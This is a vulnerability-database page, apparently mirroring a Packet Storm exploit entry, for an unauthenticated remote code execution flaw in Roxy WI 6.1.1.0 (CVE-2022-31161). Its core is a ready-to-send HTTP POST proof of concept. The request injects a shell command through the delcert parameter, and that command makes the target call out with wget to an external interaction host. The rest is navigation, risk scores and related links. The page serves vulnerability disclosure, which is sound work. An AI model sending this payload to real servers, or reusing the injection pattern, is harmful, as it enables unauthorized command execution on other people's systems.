Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNuri CilengirPACKETSTORM:171652
HistoryApr 03, 2023 - 12:00 a.m.

Roxy WI 6.1.1.0 Remote Code Execution

2023-04-0300:00:00
Nuri Cilengir
packetstormsecurity.com
152
roxy wi
remote code execution
rce
ssl_cert
ubuntu 22.04
cve-2022-31161
nuri Γ§ilengir
pentest blog

0.949 High

EPSS

Percentile

99.3%

JSON
`# ADVISORY INFORMATION  
# Exploit Title: Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload  
# Date of found: 21 July 2022  
# Application: Roxy WI <= v6.1.1.0  
# Author: Nuri Γ‡ilengir   
# Vendor Homepage: https://roxy-wi.org  
# Software Link: https://github.com/hap-wi/roxy-wi.git  
# Advisory: https://pentest.blog/advisory-roxy-wi-unauthenticated-remote-code-executions-cve-2022-31137  
# Tested on: Ubuntu 22.04  
# CVE : CVE-2022-31161  
  
  
# PoC  
POST /app/options.py HTTP/1.1  
Host: 192.168.56.116  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:101.0) Gecko/20100101 Firefox/101.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 123  
Origin: https://192.168.56.116  
Referer: https://192.168.56.116/app/login.py  
Connection: close  
  
show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20wget%20<id>.oastify.com;  
  
`

Related

zdt 5
exploitdb 4
osv 2
nvd 2
cve 2
prion 2
cvelist 2
attackerkb 1
packetstorm 4
rapid7blog 1
nuclei 1
thn 1
mssecure 1
mmpc 1
zdt
zdt
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution via ssl_cert Upload Vulnerability
2023-04-03 00:00:00
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution Vulnerability
2023-05-26 00:00:00
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution Vulnerability
2023-04-03 00:00:00
exploitdb
exploitdb
Roxy WI v6.1.1.0 - Unauthenticated Remote Code Execution (RCE) via ssl_cert Upload
2023-04-03 00:00:00
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE) via subprocess_execute
2023-05-24 00:00:00
Roxy WI v6.1.0.0 - Unauthenticated Remote Code Execution (RCE)
2023-04-03 00:00:00
osv
osv
CVE-2022-31161
2022-07-15 21:15:08
CVE-2022-31137
2022-07-08 20:15:07
nvd
nvd
CVE-2022-31161
2022-07-15 21:15:08
CVE-2022-31137
2022-07-08 20:15:07
cve
cve
CVE-2022-31161
2022-07-15 21:15:08
CVE-2022-31137
2022-07-08 20:15:07
prion
prion
Design/Logic Flaw
2022-07-15 21:15:00
Remote code execution
2022-07-08 20:15:00
cvelist
cvelist
CVE-2022-31161 Roxy-WI Vulnerable to Unauthenticated Remote Code Execution via ssl_cert Upload
2022-07-15 00:00:00
CVE-2022-31137 Unauthenticated Remote Code Execution in Roxy-WI
2022-07-08 00:00:00
attackerkb
attackerkb
CVE-2022-31137
2022-07-08 00:00:00
packetstorm
packetstorm
Roxy WI 6.1.0.0 Remote Command Execution
2023-05-24 00:00:00
Roxy-WI Remote Command Execution
2022-07-26 00:00:00
Roxy WI 6.1.0.0 Remote Code Execution
2023-04-03 00:00:00
rapid7blog
rapid7blog
Metasploit Weekly Wrap-Up
2022-07-29 20:32:42
nuclei
nuclei
Roxy-WI <6.1.1.0 - Remote Code Execution
2022-08-12 16:51:23
thn
thn
Zerobot Botnet Emerges as a Growing Threat with New Exploits and Capabilities
2022-12-22 09:39:00
mssecure
mssecure
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00
mmpc
mmpc
Microsoft research uncovers new Zerobot capabilities
2022-12-21 20:00:00

0.949 High

EPSS

Percentile

99.3%

JSON
Related for PACKETSTORM:171652
zdt5exploitdb4osv2nvd2cve2prion2cvelist2attackerkb1packetstorm4rapid7blog1nuclei1thn1mssecure1mmpc1